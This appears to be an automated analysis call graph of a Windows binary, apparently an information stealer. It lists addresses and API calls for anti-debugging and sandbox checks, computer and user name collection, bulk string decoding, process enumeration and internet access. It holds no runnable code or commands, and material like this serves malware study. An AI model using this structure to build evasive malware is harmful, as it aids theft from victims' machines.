73845->73846 73847 4047e8 3 API calls 73846->73847 73848 402e7d 73847->73848 73849 4047e8 3 API calls 73848->73849 73850 402e94 73849->73850 73851 4047e8 3 API calls 73850->73851 73852 402eaa 73851->73852 73853 4047e8 3 API calls 73852->73853 73854 402ec1 73853->73854 73855 4047e8 3 API calls 73854->73855 73856 402ed8 73855->73856 73857 4047e8 3 API calls 73856->73857 73858 402eec 73857->73858 73859 4047e8 3 API calls 73858->73859 73860 402f03 73859->73860 73861 418685 73860->73861 74361 4185dc GetPEB 73861->74361 73863 41868b 73864 418886 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 73863->73864 73865 41869b 73863->73865 73866 4188e5 GetProcAddress 73864->73866 73867 4188f7 73864->73867 73874 4186b5 20 API calls 73865->73874 73866->73867 73868 418900 GetProcAddress GetProcAddress 73867->73868 73869 418929 73867->73869 73868->73869 73870 418932 GetProcAddress 73869->73870 73871 418944 73869->73871 73870->73871 73872 41894d GetProcAddress 73871->73872 73873 41895f 73871->73873 73872->73873 73875 418503 73873->73875 73876 418968 GetProcAddress GetProcAddress 73873->73876 73874->73864 73877 4010f0 GetCurrentProcess VirtualAllocExNuma 73875->73877 73876->73875 73878 401111 ExitProcess 73877->73878 73879 401098 VirtualAlloc 73877->73879 73882 4010b8 _memset 73879->73882 73881 4010ec 73884 401284 73881->73884 73882->73881 73883 4010d5 VirtualFree 73882->73883 73883->73881 73885 4012ac _memset 73884->73885 73886 4012bb 13 API calls 73885->73886 74362 410c5a GetProcessHeap HeapAlloc GetComputerNameA 73886->74362 73888 4013e9 74364 41d05a 73888->74364 73892 4013b9 73892->73888 73894 4013e2 ExitProcess 73892->73894 73893 4013f4 73893->73738 73895->73743 73896->73751 74374 4014ad GetPEB 73897->74374 73900 4014ad 2 API calls 73901 401516 73900->73901 73902 4014ad 2 API calls 73901->73902 73919 4015a1 73901->73919 73903 401529 73902->73903 73904 4014ad 2 API calls 73903->73904 73903->73919 73905 401538 73904->73905 73906 4014ad 2 API calls 73905->73906 73905->73919 73907 401547 73906->73907 73908 4014ad 2 API calls 73907->73908 73907->73919 73909 401556 73908->73909 73910 4014ad 2 API calls 73909->73910 73909->73919 73911 401565 73910->73911 73912 4014ad 2 API calls 73911->73912 73911->73919 73913 401574 73912->73913 73914 4014ad 2 API calls 73913->73914 73913->73919 73915 401583 73914->73915 73916 4014ad 2 API calls 73915->73916 73915->73919 73917 401592 73916->73917 73918 4014ad 2 API calls 73917->73918 73917->73919 73918->73919 73919->73760 73921 4016a4 wsprintfW 73920->73921 73931 4017f7 73920->73931 73922 4016d0 CreateFileW 73921->73922 73924 4016fb GetProcessHeap RtlAllocateHeap _time64 srand rand 73922->73924 73922->73931 73923 41d05a __setlocale_nolock 5 API calls 73925 401807 73923->73925 73926 401754 _memset 73924->73926 73925->73768 73927 401733 WriteFile 73926->73927 73928 401768 CloseHandle CreateFileW 73926->73928 73930 4017c3 GetProcessHeap RtlFreeHeap CloseHandle 73926->73930 73926->73931 73927->73926 73927->73931 73929 40179e ReadFile 73928->73929 73928->73931 73929->73926 73929->73931 73930->73922 73930->73931 73931->73923 73933 417093 73932->73933 74378 4104bc 73933->74378 73937 4170c2 74383 4105de lstrlenA 73937->74383 73940 4105de 3 API calls 73941 4170e7 73940->73941 73942 4105de 3 API calls 73941->73942 73943 4170f0 73942->73943 74387 410562 73943->74387 73945 4170fc 73946 417125 OpenEventA 73945->73946 73947 417138 CreateEventA 73946->73947 73948 41711e CloseHandle 73946->73948 73949 4104bc lstrcpyA 73947->73949 73948->73946 73950 417160 73949->73950 74391 41051e lstrlenA 73950->74391 73953 41051e 2 API calls 73954 4171c7 73953->73954 74395 402f12 73954->74395 73957 418995 121 API calls 73958 41730c 73957->73958 73959 4104bc lstrcpyA 73958->73959 74173 4175c1 73958->74173 73961 417327 73959->73961 73963 4105de 3 API calls 73961->73963 73965 417339 73963->73965 73964 410562 lstrcpyA 73966 4175f1 73964->73966 73967 410562 lstrcpyA 73965->73967 73969 4104bc lstrcpyA 73966->73969 73968 417342 73967->73968 73972 4105de 3 API calls 73968->73972 73970 417608 73969->73970 73971 4105de 3 API calls 73970->73971 73973 41761b 73971->73973 73974 41735d 73972->73974 74967 41059c 73973->74967 73976 410562 lstrcpyA 73974->73976 73978 417366 73976->73978 73980 4105de 3 API calls 73978->73980 73979 410562 lstrcpyA 73983 417634 73979->73983 73981 417381 73980->73981 73982 410562 lstrcpyA 73981->73982 73984 41738a 73982->73984 73985 417646 CreateDirectoryA 73983->73985 73988 4105de 3 API calls 73984->73988 74971 401cfd 73985->74971 73990 4173a5 73988->73990 73992 410562 lstrcpyA 73990->73992 73991 417670 75055 41828f 73991->75055 73995 4173ae 73992->73995 73994 417681 73996 410562 lstrcpyA 73994->73996 73997 4105de 3 API calls 73995->73997 73998 417698 73996->73998 73999 4173c9 73997->73999 74000 410562 lstrcpyA 73998->74000 74001 410562 lstrcpyA 73999->74001 74003 4176a8 74000->74003 74002 4173d2 74001->74002 74006 4105de 3 API calls 74002->74006 75062 4104ee 74003->75062 74008 4173ed 74006->74008 74007 4105de 3 API calls 74009 4176c7 74007->74009 74010 410562 lstrcpyA 74008->74010 74011 410562 lstrcpyA 74009->74011 74012 4173f6 74010->74012 74013 4176d0 74011->74013 74014 4105de 3 API calls 74012->74014 74015 41059c 2 API calls 74013->74015 74017 417411 74014->74017 74016 4176ed 74015->74016 74018 410562 lstrcpyA 74016->74018 74019 410562 lstrcpyA 74017->74019 74020 4176f6 74018->74020 74021 41741a 74019->74021 74022 4176ff InternetOpenA InternetOpenA 74020->74022 74024 4105de 3 API calls 74021->74024 74023 4104ee lstrcpyA 74022->74023 74026 417749 74023->74026 74025 417435 74024->74025 74027 410562 lstrcpyA 74025->74027 74028 4104bc lstrcpyA 74026->74028 74029 41743e 74027->74029 74030 417758 74028->74030 74033 4105de 3 API calls 74029->74033 75066 410977 GetWindowsDirectoryA 74030->75066 74035 417459 74033->74035 74034 4104ee lstrcpyA 74036 417773 74034->74036 74037 410562 lstrcpyA 74035->74037 75084 404b2e 74036->75084 74039 417462 74037->74039 74043 4105de 3 API calls 74039->74043 74042 417786 74044 4104bc lstrcpyA 74042->74044 74045 41747d 74043->74045 74046 4177bb 74044->74046 74047 410562 lstrcpyA 74045->74047 74048 401cfd lstrcpyA 74046->74048 74049 417486 74047->74049 74050 4177cc 74048->74050 74052 4105de 3 API calls 74049->74052 75234 405f39 74050->75234 74054 4174a1 74052->74054 74056 410562 lstrcpyA 74054->74056 74058 4174aa 74056->74058 74057 4177e4 74059 4104bc lstrcpyA 74057->74059 74062 4105de 3 API calls 74058->74062 74060 4177f8 74059->74060 74061 401cfd lstrcpyA 74060->74061 74063 417802 74061->74063 74064 4174c5 74062->74064 74065 405f39 43 API calls 74063->74065 74067 410562 lstrcpyA 74064->74067 74066 41780e 74065->74066 75407 413299 strtok_s 74066->75407 74069 4174ce 74067->74069 74073 4105de 3 API calls 74069->74073 74070 417821 74071 4104bc lstrcpyA 74070->74071 74072 417834 74071->74072 74074 401cfd lstrcpyA 74072->74074 74075 4174e9 74073->74075 74076 417845 74074->74076 74077 410562 lstrcpyA 74075->74077 74079 405f39 43 API calls 74076->74079 74078 4174f2 74077->74078 74082 4105de 3 API calls 74078->74082 74080 417851 74079->74080 75416 4133d0 strtok_s 74080->75416 74084 41750d 74082->74084 74083 417864 74085 401cfd lstrcpyA 74083->74085 74086 410562 lstrcpyA 74084->74086 74087 417875 74085->74087 74088 417516 74086->74088 75423 413bc6 74087->75423 74093 4105de 3 API calls 74088->74093 74090 41787a 74091 4104ee lstrcpyA 74090->74091 74092 41788b 74091->74092 74094 4104bc lstrcpyA 74092->74094 74095 417531 74093->74095 74096 417899 74094->74096 74097 410562 lstrcpyA 74095->74097 75761 405237 74096->75761 74099 41753a 74097->74099 74103 4105de 3 API calls 74099->74103 74101 401cfd lstrcpyA 74102 4178b5 74101->74102 75772 40ea91 74102->75772 74104 417555 74103->74104 74106 410562 lstrcpyA 74104->74106 74108 41755e 74106->74108 74115 4105de 3 API calls 74108->74115 74119 417579 74115->74119 74123 410562 lstrcpyA 74119->74123 74127 417582 74123->74127 74138 4105de 3 API calls 74127->74138 74143 41759d 74138->74143 74147 410562 lstrcpyA 74143->74147 74150 4175a6 74147->74150 74950 412554 74150->74950 74166 41ccb1 10 API calls 74166->74173 74959 411c1f 74173->74959 74358 402b7c 74357->74358 74359 40480f 74357->74359 74358->73783 74360 404818 lstrlenA 74359->74360 74360->74358 74360->74360 74361->73863 74363 401385 74362->74363 74363->73888 74372 410c28 GetProcessHeap HeapAlloc GetUserNameA 74363->74372 74365 41d062 74364->74365 74366 41d064 IsDebuggerPresent 74364->74366 74365->73893 74373 41d9c5 74366->74373 74369 41d4a4 SetUnhandledExceptionFilter UnhandledExceptionFilter 74370 41d4c1 __call_reportfault 74369->74370 74371 41d4c9 GetCurrentProcess TerminateProcess 74369->74371 74370->74371 74371->73893 74372->73892 74373->74369 74375 4014e9 74374->74375 74376 4014d9 lstrcmpiW 74375->74376 74377 4014ef 74375->74377 74376->74375 74376->74377 74377->73900 74377->73919 74379 4104c7 74378->74379 74380 4104e8 74379->74380 74381 4104de lstrcpyA 74379->74381 74382 410c28 GetProcessHeap HeapAlloc GetUserNameA 74380->74382 74381->74380 74382->73937 74385 410605 74383->74385 74384 41062b 74384->73940 74385->74384 74386 410618 lstrcpyA lstrcatA 74385->74386 74386->74384 74388 410571 74387->74388 74389 410598 74388->74389 74390 410590 lstrcpyA 74388->74390 74389->73945 74390->74389 74392 410533 74391->74392 74393 41055c 74392->74393 74394 410552 lstrcpyA 74392->74394 74393->73953 74394->74393 74396 4047e8 3 API calls 74395->74396 74397 402f27 74396->74397 74398 4047e8 3 API calls 74397->74398 74399 402f3e 74398->74399 74400 4047e8 3 API calls 74399->74400 74401 402f55 74400->74401 74402 4047e8 3 API calls 74401->74402 74403 402f6c 74402->74403 74404 4047e8 3 API calls 74403->74404 74405 402f85 74404->74405 74406 4047e8 3 API calls 74405->74406 74407 402f9c 74406->74407 74408 4047e8 3 API calls 74407->74408 74409 402fb3 74408->74409 74410 4047e8 3 API calls 74409->74410 74411 402fca 74410->74411 74412 4047e8 3 API calls 74411->74412 74413 402fe4 74412->74413 74414 4047e8 3 API calls 74413->74414 74415 402ffb 74414->74415 74416 4047e8 3 API calls 74415->74416 74417 403011 74416->74417 74418 4047e8 3 API calls 74417->74418 74419 403028 74418->74419 74420 4047e8 3 API calls 74419->74420 74421 40303f 74420->74421 74422 4047e8 3 API calls 74421->74422 74423 403056 74422->74423 74424 4047e8 3 API calls 74423->74424 74425 40306d 74424->74425 74426 4047e8 3 API calls 74425->74426 74427 403084 74426->74427 74428 4047e8 3 API calls 74427->74428 74429 40309b 74428->74429 74430 4047e8 3 API calls 74429->74430 74431 4030b2 74430->74431 74432 4047e8 3 API calls 74431->74432 74433 4030c9 74432->74433 74434 4047e8 3 API calls 74433->74434 74435 4030df 74434->74435 74436 4047e8 3 API calls 74435->74436 74437 4030f6 74436->74437 74438 4047e8 3 API calls 74437->74438 74439 40310f 74438->74439 74440 4047e8 3 API calls 74439->74440 74441 403123 74440->74441 74442 4047e8 3 API calls 74441->74442 74443 40313a 74442->74443 74444 4047e8 3 API calls 74443->74444 74445 403154 74444->74445 74446 4047e8 3 API calls 74445->74446 74447 40316b 74446->74447 74448 4047e8 3 API calls 74447->74448 74449 403182 74448->74449 74450 4047e8 3 API calls 74449->74450 74451 403199 74450->74451 74452 4047e8 3 API calls 74451->74452 74453 4031af 74452->74453 74454 4047e8 3 API calls 74453->74454 74455 4031c5 74454->74455 74456 4047e8 3 API calls 74455->74456 74457 4031dc 74456->74457 74458 4047e8 3 API calls 74457->74458 74459 4031f2 74458->74459 74460 4047e8 3 API calls 74459->74460 74461 40320c 74460->74461 74462 4047e8 3 API calls 74461->74462 74463 403223 74462->74463 74464 4047e8 3 API calls 74463->74464 74465 40323a 74464->74465 74466 4047e8 3 API calls 74465->74466 74467 403250 74466->74467 74468 4047e8 3 API calls 74467->74468 74469 403267 74468->74469 74470 4047e8 3 API calls 74469->74470 74471 40327e 74470->74471 74472 4047e8 3 API calls 74471->74472 74473 403295 74472->74473 74474 4047e8 3 API calls 74473->74474 74475 4032ab 74474->74475 74476 4047e8 3 API calls 74475->74476 74477 4032c2 74476->74477 74478 4047e8 3 API calls 74477->74478 74479 4032d9 74478->74479 74480 4047e8 3 API calls 74479->74480 74481 4032f0 74480->74481 74482 4047e8 3 API calls 74481->74482 74483 403306 74482->74483 74484 4047e8 3 API calls 74483->74484 74485 40331c 74484->74485 74486 4047e8 3 API calls 74485->74486 74487 403333 74486->74487 74488 4047e8 3 API calls 74487->74488 74489 403349 74488->74489 74490 4047e8 3 API calls 74489->74490 74491 40335d 74490->74491 74492 4047e8 3 API calls 74491->74492 74493 403374 74492->74493 74494 4047e8 3 API calls 74493->74494 74495 40338a 74494->74495 74496 4047e8 3 API calls 74495->74496 74497 4033a1 74496->74497 74498 4047e8 3 API calls 74497->74498 74499 4033b8 74498->74499 74500 4047e8 3 API calls 74499->74500 74501 4033cf 74500->74501 74502 4047e8 3 API calls 74501->74502 74503 4033e6 74502->74503 74504 4047e8 3 API calls 74503->74504 74505 4033fd 74504->74505 74506 4047e8 3 API calls 74505->74506 74507 403414 74506->74507 74508 4047e8 3 API calls 74507->74508 74509 40342e 74508->74509 74510 4047e8 3 API calls 74509->74510 74511 403445 74510->74511 74512 4047e8 3 API calls 74511->74512 74513 40345c 74512->74513 74514 4047e8 3 API calls 74513->74514 74515 403473 74514->74515 74516 4047e8 3 API calls 74515->74516 74517 40348a 74516->74517 74518 4047e8 3 API calls 74517->74518 74519 4034a1 74518->74519 74520 4047e8 3 API calls 74519->74520 74521 4034b8 74520->74521 74522 4047e8 3 API calls 74521->74522 74523 4034cf 74522->74523 74524 4047e8 3 API calls 74523->74524 74525 4034e9 74524->74525 74526 4047e8 3 API calls 74525->74526 74527 403500 74526->74527 74528 4047e8 3 API calls 74527->74528 74529 403517 74528->74529 74530 4047e8 3 API calls 74529->74530 74531 40352e 74530->74531 74532 4047e8 3 API calls 74531->74532 74533 403545 74532->74533 74534 4047e8 3 API calls 74533->74534 74535 40355c 74534->74535 74536 4047e8 3 API calls 74535->74536 74537 403573 74536->74537 74538 4047e8 3 API calls 74537->74538 74539 40358a 74538->74539 74540 4047e8 3 API calls 74539->74540 74541 4035a4 74540->74541 74542 4047e8 3 API calls 74541->74542 74543 4035bb 74542->74543 74544 4047e8 3 API calls 74543->74544 74545 4035d2 74544->74545 74546 4047e8 3 API calls 74545->74546 74547 4035e9 74546->74547 74548 4047e8 3 API calls 74547->74548 74549 403600 74548->74549 74550 4047e8 3 API calls 74549->74550 74551 403617 74550->74551 74552 4047e8 3 API calls 74551->74552 74553 40362d 74552->74553 74554 4047e8 3 API calls 74553->74554 74555 403643 74554->74555 74556 4047e8 3 API calls 74555->74556 74557 40365d 74556->74557 74558 4047e8 3 API calls 74557->74558 74559 403674 74558->74559 74560 4047e8 3 API calls 74559->74560 74561 40368b 74560->74561 74562 4047e8 3 API calls 74561->74562 74563 4036a1 74562->74563 74564 4047e8 3 API calls 74563->74564 74565 4036b8 74564->74565 74566 4047e8 3 API calls 74565->74566 74567 4036cf 74566->74567 74568 4047e8 3 API calls 74567->74568 74569 4036e3 74568->74569 74570 4047e8 3 API calls 74569->74570 74571 4036f9 74570->74571 74572 4047e8 3 API calls 74571->74572 74573 403713 74572->74573 74574 4047e8 3 API calls 74573->74574 74575 40372a 74574->74575 74576 4047e8 3 API calls 74575->74576 74577 403741 74576->74577 74578 4047e8 3 API calls 74577->74578 74579 403758 74578->74579 74580 4047e8 3 API calls 74579->74580 74581 40376f 74580->74581 74582 4047e8 3 API calls 74581->74582 74583 403786 74582->74583 74584 4047e8 3 API calls 74583->74584 74585 40379a 74584->74585 74586 4047e8 3 API calls 74585->74586 74587 4037b1 74586->74587 74588 4047e8 3 API calls 74587->74588 74589 4037cb 74588->74589 74590 4047e8 3 API calls 74589->74590 74591 4037e2 74590->74591 74592 4047e8 3 API calls 74591->74592 74593 4037f6 74592->74593 74594 4047e8 3 API calls 74593->74594 74595 40380a 74594->74595 74596 4047e8 3 API calls 74595->74596 74597 403821 74596->74597 74598 4047e8 3 API calls 74597->74598 74599 403838 74598->74599 74600 4047e8 3 API calls 74599->74600 74601 40384f 74600->74601 74602 4047e8 3 API calls 74601->74602 74603 403866 74602->74603 74604 4047e8 3 API calls 74603->74604 74605 403880 74604->74605 74606 4047e8 3 API calls 74605->74606 74607 403897 74606->74607 74608 4047e8 3 API calls 74607->74608 74609 4038ae 74608->74609 74610 4047e8 3 API calls 74609->74610 74611 4038c5 74610->74611 74612 4047e8 3 API calls 74611->74612 74613 4038db 74612->74613 74614 4047e8 3 API calls 74613->74614 74615 4038f2 74614->74615 74616 4047e8 3 API calls 74615->74616 74617 403906 74616->74617 74618 4047e8 3 API calls 74617->74618 74619 40391d 74618->74619 74620 4047e8 3 API calls 74619->74620 74621 403937 74620->74621 74622 4047e8 3 API calls 74621->74622 74623 40394e 74622->74623 74624 4047e8 3 API calls 74623->74624 74625 403965 74624->74625 74626 4047e8 3 API calls 74625->74626 74627 40397c 74626->74627 74628 4047e8 3 API calls 74627->74628 74629 403993 74628->74629 74630 4047e8 3 API calls 74629->74630 74631 4039aa 74630->74631 74632 4047e8 3 API calls 74631->74632 74633 4039c1 74632->74633 74634 4047e8 3 API calls 74633->74634 74635 4039d8 74634->74635 74636 4047e8 3 API calls 74635->74636 74637 4039f2 74636->74637 74638 4047e8 3 API calls 74637->74638 74639 403a09 74638->74639 74640 4047e8 3 API calls 74639->74640 74641 403a20 74640->74641 74642 4047e8 3 API calls 74641->74642 74643 403a37 74642->74643 74644 4047e8 3 API calls 74643->74644 74645 403a4e 74644->74645 74646 4047e8 3 API calls 74645->74646 74647 403a65 74646->74647 74648 4047e8 3 API calls 74647->74648 74649 403a7c 74648->74649 74650 4047e8 3 API calls 74649->74650 74651 403a90 74650->74651 74652 4047e8 3 API calls 74651->74652 74653 403aaa 74652->74653 74654 4047e8 3 API calls 74653->74654 74655 403ac1 74654->74655 74656 4047e8 3 API calls 74655->74656 74657 403ad7 74656->74657 74658 4047e8 3 API calls 74657->74658 74659 403aee 74658->74659 74660 4047e8 3 API calls 74659->74660 74661 403b05 74660->74661 74662 4047e8 3 API calls 74661->74662 74663 403b1c 74662->74663 74664 4047e8 3 API calls 74663->74664 74665 403b33 74664->74665 74666 4047e8 3 API calls 74665->74666 74667 403b4a 74666->74667 74668 4047e8 3 API calls 74667->74668 74669 403b61 74668->74669 74670 4047e8 3 API calls 74669->74670 74671 403b75 74670->74671 74672 4047e8 3 API calls 74671->74672 74673 403b8c 74672->74673 74674 4047e8 3 API calls 74673->74674 74675 403ba3 74674->74675 74676 4047e8 3 API calls 74675->74676 74677 403bba 74676->74677 74678 4047e8 3 API calls 74677->74678 74679 403bd1 74678->74679 74680 4047e8 3 API calls 74679->74680 74681 403be8 74680->74681 74682 4047e8 3 API calls 74681->74682 74683 403bff 74682->74683 74684 4047e8 3 API calls 74683->74684 74685 403c19 74684->74685 74686 4047e8 3 API calls 74685->74686 74687 403c30 74686->74687 74688 4047e8 3 API calls 74687->74688 74689 403c47 74688->74689 74690 4047e8 3 API calls 74689->74690 74691 403c5e 74690->74691 74692 4047e8 3 API calls 74691->74692 74693 403c75 74692->74693 74694 4047e8 3 API calls 74693->74694 74695 403c8c 74694->74695 74696 4047e8 3 API calls 74695->74696 74697 403ca3 74696->74697 74698 4047e8 3 API calls 74697->74698 74699 403cb7 74698->74699 74700 4047e8 3 API calls 74699->74700 74701 403cd1 74700->74701 74702 4047e8 3 API calls 74701->74702 74703 403ce8 74702->74703 74704 4047e8 3 API calls 74703->74704 74705 403cff 74704->74705 74706 4047e8 3 API calls 74705->74706 74707 403d16 74706->74707 74708 4047e8 3 API calls 74707->74708 74709 403d2c 74708->74709 74710 4047e8 3 API calls 74709->74710 74711 403d43 74710->74711 74712 4047e8 3 API calls 74711->74712 74713 403d57 74712->74713 74714 4047e8 3 API calls 74713->74714 74715 403d6e 74714->74715 74716 4047e8 3 API calls 74715->74716 74717 403d85 74716->74717 74718 4047e8 3 API calls 74717->74718 74719 403d9c 74718->74719 74720 4047e8 3 API calls 74719->74720 74721 403db3 74720->74721 74722 4047e8 3 API calls 74721->74722 74723 403dca 74722->74723 74724 4047e8 3 API calls 74723->74724 74725 403de1 74724->74725 74726 4047e8 3 API calls 74725->74726 74727 403df8 74726->74727 74728 4047e8 3 API calls 74727->74728 74729 403e0f 74728->74729 74730 4047e8 3 API calls 74729->74730 74731 403e26 74730->74731 74732 4047e8 3 API calls 74731->74732 74733 403e40 74732->74733 74734 4047e8 3 API calls 74733->74734 74735 403e57 74734->74735 74736 4047e8 3 API calls 74735->74736 74737 403e6e 74736->74737 74738 4047e8 3 API calls 74737->74738 74739 403e84 74738->74739 74740 4047e8 3 API calls 74739->74740 74741 403e9b 74740->74741 74742 4047e8 3 API calls 74741->74742 74743 403eb2 74742->74743 74744 4047e8 3 API calls 74743->74744 74745 403ec9 74744->74745 74746 4047e8 3 API calls 74745->74746 74747 403ee0 74746->74747 74748 4047e8 3 API calls 74747->74748 74749 403efa 74748->74749 74750 4047e8 3 API calls 74749->74750 74751 403f10 74750->74751 74752 4047e8 3 API calls 74751->74752 74753 403f27 74752->74753 74754 4047e8 3 API calls 74753->74754 74755 403f3e 74754->74755 74756 4047e8 3 API calls 74755->74756 74757 403f55 74756->74757 74758 4047e8 3 API calls 74757->74758 74759 403f6c 74758->74759 74760 4047e8 3 API calls 74759->74760 74761 403f80 74760->74761 74762 4047e8 3 API calls 74761->74762 74763 403f97 74762->74763 74764 4047e8 3 API calls 74763->74764 74765 403fb1 74764->74765 74766 4047e8 3 API calls 74765->74766 74767 403fc7 74766->74767 74768 4047e8 3 API calls 74767->74768 74769 403fde 74768->74769 74770 4047e8 3 API calls 74769->74770 74771 403ff2 74770->74771 74772 4047e8 3 API calls 74771->74772 74773 404009 74772->74773 74774 4047e8 3 API calls 74773->74774 74775 404020 74774->74775 74776 4047e8 3 API calls 74775->74776 74777 404037 74776->74777 74778 4047e8 3 API calls 74777->74778 74779 40404e 74778->74779 74780 4047e8 3 API calls 74779->74780 74781 404067 74780->74781 74782 4047e8 3 API calls 74781->74782 74783 40407e 74782->74783 74784 4047e8 3 API calls 74783->74784 74785 404094 74784->74785 74786 4047e8 3 API calls 74785->74786 74787 4040a8 74786->74787 74788 4047e8 3 API calls 74787->74788 74789 4040bf 74788->74789 74790 4047e8 3 API calls 74789->74790 74791 4040d6 74790->74791 74792 4047e8 3 API calls 74791->74792 74793 4040ed 74792->74793 74794 4047e8 3 API calls 74793->74794 74795 404104 74794->74795 74796 4047e8 3 API calls 74795->74796 74797 40411e 74796->74797 74798 4047e8 3 API calls 74797->74798 74799 404135 74798->74799 74800 4047e8 3 API calls 74799->74800 74801 40414c 74800->74801 74802 4047e8 3 API calls 74801->74802 74803 404163 74802->74803 74804 4047e8 3 API calls 74803->74804 74805 404179 74804->74805 74806 4047e8 3 API calls 74805->74806 74807 40418d 74806->74807 74808 4047e8 3 API calls 74807->74808 74809 4041a1 74808->74809 74810 4047e8 3 API calls 74809->74810 74811 4041b8 74810->74811 74812 4047e8 3 API calls 74811->74812 74813 4041d2 74812->74813 74814 4047e8 3 API calls 74813->74814 74815 4041e8 74814->74815 74816 4047e8 3 API calls 74815->74816 74817 4041ff 74816->74817 74818 4047e8 3 API calls 74817->74818 74819 404216 74818->74819 74820 4047e8 3 API calls 74819->74820 74821 40422d 74820->74821 74822 4047e8 3 API calls 74821->74822 74823 404244 74822->74823 74824 4047e8 3 API calls 74823->74824 74825 404258 74824->74825 74826 4047e8 3 API calls 74825->74826 74827 40426e 74826->74827 74828 4047e8 3 API calls 74827->74828 74829 404288 74828->74829 74830 4047e8 3 API calls 74829->74830 74831 40429f 74830->74831 74832 4047e8 3 API calls 74831->74832 74833 4042b6 74832->74833 74834 4047e8 3 API calls 74833->74834 74835 4042cc 74834->74835 74836 4047e8 3 API calls 74835->74836 74837 4042e3 74836->74837 74838 4047e8 3 API calls 74837->74838 74839 4042fa 74838->74839 74840 4047e8 3 API calls 74839->74840 74841 404311 74840->74841 74842 4047e8 3 API calls 74841->74842 74843 404325 74842->74843 74844 4047e8 3 API calls 74843->74844 74845 40433c 74844->74845 74846 4047e8 3 API calls 74845->74846 74847 404353 74846->74847 74848 4047e8 3 API calls 74847->74848 74849 40436a 74848->74849 74850 4047e8 3 API calls 74849->74850 74851 404381 74850->74851 74852 4047e8 3 API calls 74851->74852 74853 404395 74852->74853 74854 4047e8 3 API calls 74853->74854 74855 4043ac 74854->74855 74856 4047e8 3 API calls 74855->74856 74857 4043c3 74856->74857 74858 4047e8 3 API calls 74857->74858 74859 4043da 74858->74859 74860 4047e8 3 API calls 74859->74860 74861 4043f1 74860->74861 74862 4047e8 3 API calls 74861->74862 74863 404408 74862->74863 74864 4047e8 3 API calls 74863->74864 74865 40441c 74864->74865 74866 4047e8 3 API calls 74865->74866 74867 404433 74866->74867 74868 4047e8 3 API calls 74867->74868 74869 40444a 74868->74869 74870 4047e8 3 API calls 74869->74870 74871 40445e 74870->74871 74872 4047e8 3 API calls 74871->74872 74873 404472 74872->74873 74874 4047e8 3 API calls 74873->74874 74875 404486 74874->74875 74876 4047e8 3 API calls 74875->74876 74877 4044a0 74876->74877 74878 4047e8 3 API calls 74877->74878 74879 4044b7 74878->74879 74880 4047e8 3 API calls 74879->74880 74881 4044cd 74880->74881 74882 4047e8 3 API calls 74881->74882 74883 4044e4 74882->74883 74884 4047e8 3 API calls 74883->74884 74885 4044fa 74884->74885 74886 4047e8 3 API calls 74885->74886 74887 404511 74886->74887 74888 4047e8 3 API calls 74887->74888 74889 404528 74888->74889 74890 4047e8 3 API calls 74889->74890 74891 40453e 74890->74891 74892 4047e8 3 API calls 74891->74892 74893 404558 74892->74893 74894 4047e8 3 API calls 74893->74894 74895 40456f 74894->74895 74896 4047e8 3 API calls 74895->74896 74897 404586 74896->74897 74898 4047e8 3 API calls 74897->74898 74899 40459d 74898->74899 74900 4047e8 3 API calls 74899->74900 74901 4045b4 74900->74901 74902 4047e8 3 API calls 74901->74902 74903 4045cb 74902->74903 74904 4047e8 3 API calls 74903->74904 74905 4045e2 74904->74905 74906 4047e8 3 API calls 74905->74906 74907 4045f9 74906->74907 74908 4047e8 3 API calls 74907->74908 74909 404612 74908->74909 74910 4047e8 3 API calls 74909->74910 74911 404629 74910->74911 74912 4047e8 3 API calls 74911->74912 74913 404642 74912->74913 74914 4047e8 3 API calls 74913->74914 74915 404656 74914->74915 74916 4047e8 3 API calls 74915->74916 74917 40466d 74916->74917 74918 4047e8 3 API calls 74917->74918 74919 404684 74918->74919 74920 4047e8 3 API calls 74919->74920 74921 40469b 74920->74921 74922 4047e8 3 API calls 74921->74922 74923 4046b2 74922->74923 74924 4047e8 3 API calls 74923->74924 74925 4046cc 74924->74925 74926 4047e8 3 API calls 74925->74926 74927 4046e3 74926->74927 74928 4047e8 3 API calls 74927->74928 74929 4046f9 74928->74929 74930 4047e8 3 API calls 74929->74930 74931 404710 74930->74931 74932 4047e8 3 API calls 74931->74932 74933 404727 74932->74933 74934 4047e8 3 API calls 74933->74934 74935 40473d 74934->74935 74936 4047e8 3 API calls 74935->74936 74937 404754 74936->74937 74938 4047e8 3 API calls 74937->74938 74939 404768 74938->74939 74940 4047e8 3 API calls 74939->74940 74941 404781 74940->74941 74942 4047e8 3 API calls 74941->74942 74943 404797 74942->74943 74944 4047e8 3 API calls 74943->74944 74945 4047ae 74944->74945 74946 4047e8 3 API calls 74945->74946 74947 4047c5 74946->74947 74948 4047e8 3 API calls 74947->74948 74949 4047dc 74948->74949 74949->73957 76254 42f159 74950->76254 74952 412563 CreateToolhelp32Snapshot Process32First 74953 4125c4 CloseHandle 74952->74953 74954 412597 Process32Next 74952->74954 76255 42f1b5 74953->76255 74954->74953 74956 4125a9 StrCmpCA 74954->74956 74956->74954 74958 4125bb 74956->74958 74958->74954 74960 4104bc lstrcpyA 74959->74960 74961 411c3c 74960->74961 74962 4104bc lstrcpyA 74961->74962 74963 411c4a GetSystemTime 74962->74963 74964 411c66 74963->74964 74965 41d05a __setlocale_nolock 5 API calls 74964->74965 74966 411c9d 74965->74966 74966->73964 74968 4105b6 74967->74968 74969 4105da 74968->74969 74970 4105c8 lstrcpyA lstrcatA 74968->74970 74969->73979 74970->74969 74972 4104ee lstrcpyA 74971->74972 74973 401d07 74972->74973 74974 4104ee lstrcpyA 74973->74974 74975 401d12 74974->74975 74976 4104ee lstrcpyA 74975->74976 74977 401d1d 74976->74977 74978 4104ee lstrcpyA 74977->74978 74979 401d34 74978->74979 74980 4169f8 74979->74980 74981 41051e 2 API calls 74980->74981 74982 416a2e 74981->74982 74983 41051e 2 API calls 74982->74983 74984 416a3b 74983->74984 74985 41051e 2 API calls 74984->74985 74986 416a48 74985->74986 74987 4104bc lstrcpyA 74986->74987 74988 416a55 74987->74988 74989 4104bc lstrcpyA 74988->74989 74990 416a62 74989->74990 74991 4104bc lstrcpyA 74990->74991 74992 416a6f 74991->74992 74993 4104bc lstrcpyA 74992->74993 74994 416a7c 74993->74994 74995 4104bc lstrcpyA 74994->74995 74996 416a89 74995->74996 74997 4104bc lstrcpyA 74996->74997 75053 416a96 74997->75053 75000 416ada StrCmpCA 75001 416b33 StrCmpCA 75000->75001 75000->75053 75002 416d16 75001->75002 75001->75053 75005 410562 lstrcpyA 75002->75005 75006 416d21 75005->75006 75008 4104bc lstrcpyA 75006->75008 75009 416d2e 